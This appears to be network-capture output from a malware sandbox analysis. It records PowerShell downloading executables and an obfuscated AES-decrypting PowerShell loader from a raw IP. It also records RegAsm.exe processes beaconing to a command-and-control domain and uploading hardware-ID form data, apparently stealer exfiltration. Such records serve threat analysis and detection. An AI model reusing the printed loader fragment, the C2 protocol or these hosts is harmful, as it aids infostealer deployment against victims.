                                                          Data Ascii: TlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE
                                                          Dec 24, 2024 02:18:17.516563892 CET1236INData Raw: 46 00 45 00 52 00 6d 00 78 00 4f 00 56 00 6c 00 6c 00 6e 00 5a 00 47 00 46 00 43 00 4d 00 55 00 56 00 45 00 52 00 6d 00 78 00 4f 00 56 00 6d 00 4a 00 33 00 65 00 45 00 4e 00 52 00 62 00 55 00 31 00 4e 00 52 00 44 00 46 00 6a 00 52 00 6c 00 56 00
                                                          Data Ascii: FERmxOVllnZGFCMUVERmxOVmJ3eENRbU1NRDFjRlVBdFRGWGtFTVZNV2NndFpESElIRGxNU1p4WlRTbjhNRm1ZQmRFSkdFRmtCQjBVR0trSmZERUpDQUZjR1l5
                                                          Dec 24, 2024 02:18:18.095757961 CET | 156 | OUT | GET /infopage/inbg.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                          Dec 24, 2024 02:18:18.492990971 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:18 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:07:09 GMT
                                                          ETag: "49c00-629dc654be596"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 302080
                                                          Content-Type: application/x-msdos-program


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.8 | 49711 | 147.45.44.131 | 80 | 3352 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 24, 2024 02:18:19.362927914 CET | 275 | OUT | GET /infopage/ybfh.ps1 HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                          Host: 147.45.44.131
                                                          Connection: Keep-Alive
                                                          Dec 24, 2024 02:18:20.609555960 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:20 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 15:01:38 GMT
                                                          ETag: "732-629dd28283c2c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 1842
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Data Ascii:
                                                          $ioPQpmSsQv = 'r5KwMLgEio3cmH6JdYQrp7jkxmA4rsN3cpKJioKl3/k='
                                                          $WCEbGZK5eB = 'DNE6ARUYWXvLmTm/HwwRhw=='
                                                          $CyrxmaUOA2 = '[TRUNCATED]'
                                                          function avtIDt48Cb ($p7hxeaS5g2, $ioPQpmSsQv, $WCEbGZK5eB) {
                                                              $cTaSLj6r0V = [Convert]::FromBase64String($ioPQpmSsQv)
                                                              $F1V1q6ulZs = [Convert]::FromBase64String($WCEbGZK5eB)
                                                              $vY3h0Tbp6I = [Convert]::FromBase64String(
                                                          Dec 24, 2024 02:18:20.609700918 CET | 867 | IN | Data Ascii:
                                                          $p7hxeaS5g2)
                                                              $aQhXBizRAx = [System.Security.Cryptography.Aes]::Create()
                                                              $aQhXBizRAx.Key = $cTaSLj6r0V
                                                              $aQhXBizRAx.IV = $F1V1q6ulZs
                                                              $aQhXBizRAx.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
                                                              $gBOWS1t7hT = $
                                                          Dec 24, 2024 02:18:21.301177979 CET | 156 | OUT | GET /infopage/oung.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                          Dec 24, 2024 02:18:21.702497005 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:21 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:24:51 GMT
                                                          ETag: "ae00-629dca4a1509c"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 44544
                                                          Content-Type: application/x-msdos-program
                                                          Dec 24, 2024 02:18:22.024548054 CET | 156 | OUT | GET /infopage/inbg.exe HTTP/1.1
                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                          Host: 147.45.44.131
                                                          Dec 24, 2024 02:18:22.425848007 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:22 GMT
                                                          Server: Apache/2.4.52 (Ubuntu)
                                                          Last-Modified: Sun, 22 Dec 2024 14:07:09 GMT
                                                          ETag: "49c00-629dc654be596"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 302080
                                                          Content-Type: application/x-msdos-program


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          0 | 192.168.2.8 | 49709 | 172.67.195.241 | 443 | 2288 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-12-24 01:18:21 UTC | 263 | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 8
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:21 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                          Data Ascii: act=life
                                                          2024-12-24 01:18:21 UTC | 1124 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:21 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=jdb1asboe2mqcfh17r2qjrd1eq; expires=Fri, 18 Apr 2025 19:05:00 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=97tTkFLYE4Z%2F1mVEaRoCt2lToVKpiIJ8kS32NUkC9NOzBbXI7VMOILw44xXcmHm5tZvPm3K9vLI%2BSD6lJDRFjhk8dVjqMQ3xjzLMdNQfaLpKLQh6%2B7J%2BWFKqSmekUrYlqtSP"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1c74b6f8c8f-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1803&rtt_var=692&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1564844&cwnd=209&unsent_bytes=0&cid=0005fd37ab829475&ts=1483&x=0"
                                                          2024-12-24 01:18:21 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                          Data Ascii: 2ok
                                                          2024-12-24 01:18:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          1 | 192.168.2.8 | 49710 | 172.67.195.241 | 443 | 4152 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-12-24 01:18:21 UTC | 263 | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 8
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:21 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                          Data Ascii: act=life
                                                          2024-12-24 01:18:21 UTC | 1122 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:21 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=13jkqaosask8m3jfbhdl2g8des; expires=Fri, 18 Apr 2025 19:05:00 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MeSoK2rWi0VXjBrdHxrt5Bp%2BogTAtyEjiabwQ2KujdNVY7LrQQ55d6nYEZFXILkoSezpqG1yUvsIDHf5ZF5krxVWrR7WWPKcOzDZHElU%2FIbIgvBHAxTuJgbCi%2BGHoyhrMuJr"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1c75e130f7f-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1531&rtt_var=634&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1907250&cwnd=243&unsent_bytes=0&cid=1dd9d42dcf3c1c04&ts=1501&x=0"
                                                          2024-12-24 01:18:21 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                          Data Ascii: 2ok
                                                          2024-12-24 01:18:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.8 | 49712 | 172.67.195.241 | 443 | 4132 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-12-24 01:18:21 UTC | 263 | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 8
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:21 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                          Data Ascii: act=life
                                                          2024-12-24 01:18:22 UTC | 1121 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:22 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=t2vkiv8jbuqu1cpt682i7kum93; expires=Fri, 18 Apr 2025 19:05:01 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VOSTq87ezMYKXZnhDuyWDdTVLREhY%2Fd8T7aq8KozFTU3AEKLYrqg7NxNQtN9HAwmaY6ZR4GmpL76SDV8i9IN02%2Fcm2727DY3G08f0c057QX7BbxckSy0B3%2BaAuFwiG9osQVw"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1ca0d11186d-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1470&rtt_var=563&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1921052&cwnd=250&unsent_bytes=0&cid=b593e559f8e9272b&ts=773&x=0"
                                                          2024-12-24 01:18:22 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                          Data Ascii: 2ok
                                                          2024-12-24 01:18:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.8 | 49716 | 172.67.195.241 | 443 | 4132 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-12-24 01:18:23 UTC | 264 | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 49
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:23 UTC | 49 bytes | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 26 6a 3d
                                                          Data Ascii: act=recive_message&ver=4.0&lid=VC6Dfm--Loader2&j=
                                                          2024-12-24 01:18:24 UTC | 1121 bytes | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:24 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=oi2kngmnn37vde6vpd6j8ja4e4; expires=Fri, 18 Apr 2025 19:05:02 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9zRUYbY6rdmr90zUxvM1JdAY%2FhhThM3qQSKBUXIVmowmrVWI%2FriG%2B7TxdroUpfxBABVeo1ZMTbHiKm9JCUphbzB55Vdb4PoMh3D3C7OGEvnJrQgC3LQ5dkGizFx6W3WfrK22"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1d67b7343d3-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1560&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=949&delivery_rate=1772920&cwnd=236&unsent_bytes=0&cid=0ebd4dd80d1a91f6&ts=767&x=0"


                                                          Session ID: 4 | Source IP: 192.168.2.8 | Source Port: 49717 | Destination IP: 172.67.195.241 | Destination Port: 443 | PID: 4132 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-12-24 01:18:25 UTC | 279 bytes | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=RFHAG1EV9SGJF3P
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 12830
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:25 UTC | 12830 bytes | OUT | Data Raw: 2d 2d 52 46 48 41 47 31 45 56 39 53 47 4a 46 33 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 44 31 38 34 45 42 43 44 36 37 39 44 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 52 46 48 41 47 31 45 56 39 53 47 4a 46 33 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 46 48 41 47 31 45 56 39 53 47 4a 46 33 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 0d 0a 2d 2d 52 46 48
                                                          Data Ascii: --RFHAG1EV9SGJF3PContent-Disposition: form-data; name="hwid"AD184EBCD679DD86AC8923850305D13E--RFHAG1EV9SGJF3PContent-Disposition: form-data; name="pid"2--RFHAG1EV9SGJF3PContent-Disposition: form-data; name="lid"VC6Dfm--Loader2--RFH
                                                          2024-12-24 01:18:26 UTC | 1124 bytes | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=tfdvd9l7vmj4lblgclq7kk4g78; expires=Fri, 18 Apr 2025 19:05:05 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1EB7WWsoc0WihQ28MKVzUUod%2FV7T6owo2PzZ5gzqhlIqYuFDmEPNgIthGLIBCwjzKUpklWC4YJre8gl4bUjcw5%2F7azMyQM8b7DYfH9BrBpRgqpXNW8bbmWsEOVFyzIwNQICY"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1e42a438c0f-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1807&min_rtt=1805&rtt_var=682&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13767&delivery_rate=1600000&cwnd=220&unsent_bytes=0&cid=26ba71e8a8ed173b&ts=1209&x=0"
                                                          2024-12-24 01:18:26 UTC | 20 bytes | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                          Data Ascii: fok 8.46.123.189
                                                          2024-12-24 01:18:26 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID: 5 | Source IP: 192.168.2.8 | Source Port: 49718 | Destination IP: 172.67.195.241 | Destination Port: 443 | PID: 4352 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-12-24 01:18:26 UTC | 263 bytes | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 8
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:26 UTC | 8 bytes | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                          Data Ascii: act=life
                                                          2024-12-24 01:18:26 UTC | 1127 bytes | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:26 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=551kvgj71kqqv65siip36rpgjn; expires=Fri, 18 Apr 2025 19:05:05 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O6r%2BYpEK6RPzQPVxEE0qTpDEnHc%2B8g4UZ%2FHxKiyEugzYchufSxWA%2FhUJtFz70URMc3WgMjz7l3IPYiYFsEvcQZYaHP1hQUhoBLZYp2FL%2BinG4vdWhjp9X%2Fgwc4rGpLSNPe0A"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1e68854431b-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1586&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1795817&cwnd=178&unsent_bytes=0&cid=3742c8f170a34a20&ts=762&x=0"
                                                          2024-12-24 01:18:26 UTC | 7 bytes | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                          Data Ascii: 2ok
                                                          2024-12-24 01:18:26 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID: 6 | Source IP: 192.168.2.8 | Source Port: 49719 | Destination IP: 172.67.195.241 | Destination Port: 443 | PID: 4352 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2024-12-24 01:18:28 UTC | 264 bytes | OUT | POST /api HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Content-Length: 49
                                                          Host: volcanoyev.click
                                                          2024-12-24 01:18:28 UTC | 49 bytes | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 43 36 44 66 6d 2d 2d 4c 6f 61 64 65 72 32 26 6a 3d
                                                          Data Ascii: act=recive_message&ver=4.0&lid=VC6Dfm--Loader2&j=
                                                          2024-12-24 01:18:28 UTC | 1125 bytes | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 24 Dec 2024 01:18:28 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Set-Cookie: PHPSESSID=bmkuk2se7884dqjofftbdfort1; expires=Fri, 18 Apr 2025 19:05:07 GMT; Max-Age=9999999; path=/
                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                          Pragma: no-cache
                                                          X-Frame-Options: DENY
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1; mode=block
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=coVvMQfL3um%2FMMEWy%2FXElxSr7S%2Bv%2BEq%2BOXEsqsjqz4BNpirjizOunCtR2ecg1DoiDsf2T00wuf7w963C1lxDTY5ywbVpfj4sQGdLWjCAm5PWbQinGL9lD5mZhyzALb8MMcHr"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8f6cc1f2ed577290-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1806&rtt_var=704&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=949&delivery_rate=1525600&cwnd=249&unsent_bytes=0&cid=7801730e68c71777&ts=770&x=0"
                                                          Data Ascii: 4Iki6vRT4ojfHABjOC3GvyyDfYr2CYOixjwi7YS6RiHVlaLaxB/i4ZPkOGuIDYPnXEJIzu9QrvcjYCLt1LpGIT2V+soQS7r01vEMR1kw/r+pfgyGimy+httYQpVMuwt5ncmunoBzzpUuyW0KSXjW9hgDRPY3WYLHIznGlLXiJkDIsKKPrSb/zduAREMMaZKjqIbY0uJ8wt5+ZCPItYYmQWSJhtrAA6bll9UMpjkx/r4xfpCG8liemmdtvqmdp2c
                                                          2024-12-24 01:18:28 UTC1369INData Raw: 76 75 63 66 39 4c 52 79 34 68 55 4e 6a 41 52 6b 39 63 34 68 72 77 6d 2b 6e 69 65 71 6a 35 42 75 6e 43 30 67 69 63 63 67 4f 6c 48 78 34 31 48 41 2b 6a 58 71 51 30 36 41 4f 57 54 68 32 68 69 48 4d 2f 2b 77 41 34 71 79 31 47 53 37 65 43 7a 39 7a 33 42 7a 59 37 79 6e 55 62 48 30 63 37 4a 62 52 6f 35 4d 59 2f 36 55 52 38 46 77 36 63 31 7a 35 39 6a 45 56 2f 4a 30 4c 74 2b 49 4f 44 41 6d 38 62 6c 52 70 2f 51 79 38 52 45 45 78 67 39 78 37 4a 4d 68 72 77 57 38 6e 79 47 6d 6d 49 46 48 67 6c 4e 37 79 73 5a 75 5a 58 36 67 36 31 2b 2f 75 7a 57 71 4f 6c 61 49 54 46 69 68 6c 41 66 52 65 76 4b 74 49 37 36 47 6b 56 36 74 49 45 6e 48 7a 32 46 30 65 4b 61 6b 55 62 48 30 63 37 4a 62 52 49 35 4d 59 2f 36 55 52 38 46 77 36 63 31 7a 35 39 6a 45 56 2f 4a 30 4c 74 2b 49 4f 44 41
                                                          Data Ascii: vucf9LRy4hUNjARk9c4hrwm+nieqj5BunC0giccgOlHx41HA+jXqQ06AOWTh2hiHM/+wA4qy1GS7eCz9z3BzY7ynUbH0c7JbRo5MY/6UR8Fw6c1z59jEV/J0Lt+IODAm8blRp/Qy8REExg9x7JMhrwW8nyGmmIFHglN7ysZuZX6g61+/uzWqOlaITFihlAfRevKtI76GkV6tIEnHz2F0eKakUbH0c7JbRI5MY/6UR8Fw6c1z59jEV/J0Lt+IODA
                                                          2024-12-24 01:18:28 UTC1369INData Raw: 72 32 55 63 75 51 41 56 6f 35 4d 61 36 2b 4d 58 35 41 6f 6f 70 55 76 74 38 53 52 55 72 73 74 49 49 6e 47 49 44 6f 6f 73 4b 45 42 38 72 74 79 76 67 55 59 7a 6b 78 34 6f 63 31 66 68 32 4c 71 79 32 37 77 6d 74 59 51 2f 43 70 74 32 39 70 6d 59 58 36 79 37 43 2f 42 6d 57 66 31 45 78 57 43 50 57 72 72 77 67 71 53 4d 72 57 6d 48 70 32 61 6b 56 69 2f 4c 31 2f 66 79 32 42 73 62 2f 48 6c 55 65 66 30 4c 62 49 75 42 4d 63 63 5a 4b 2b 61 58 35 31 69 36 74 67 74 6f 6f 2b 47 53 2f 42 71 64 4d 36 49 66 79 78 78 38 62 31 52 70 2b 63 37 73 68 46 57 6d 45 77 67 34 64 6b 65 6b 69 79 78 69 6a 4b 32 69 34 42 4c 2b 31 4e 51 35 4e 70 6e 63 6d 76 7a 6d 68 7a 37 6f 6d 44 78 45 78 48 2b 4d 6b 72 39 30 77 2b 53 59 4a 36 66 4c 62 79 32 71 48 2b 74 61 6e 36 4c 37 6d 4e 30 61 2f 48 6c
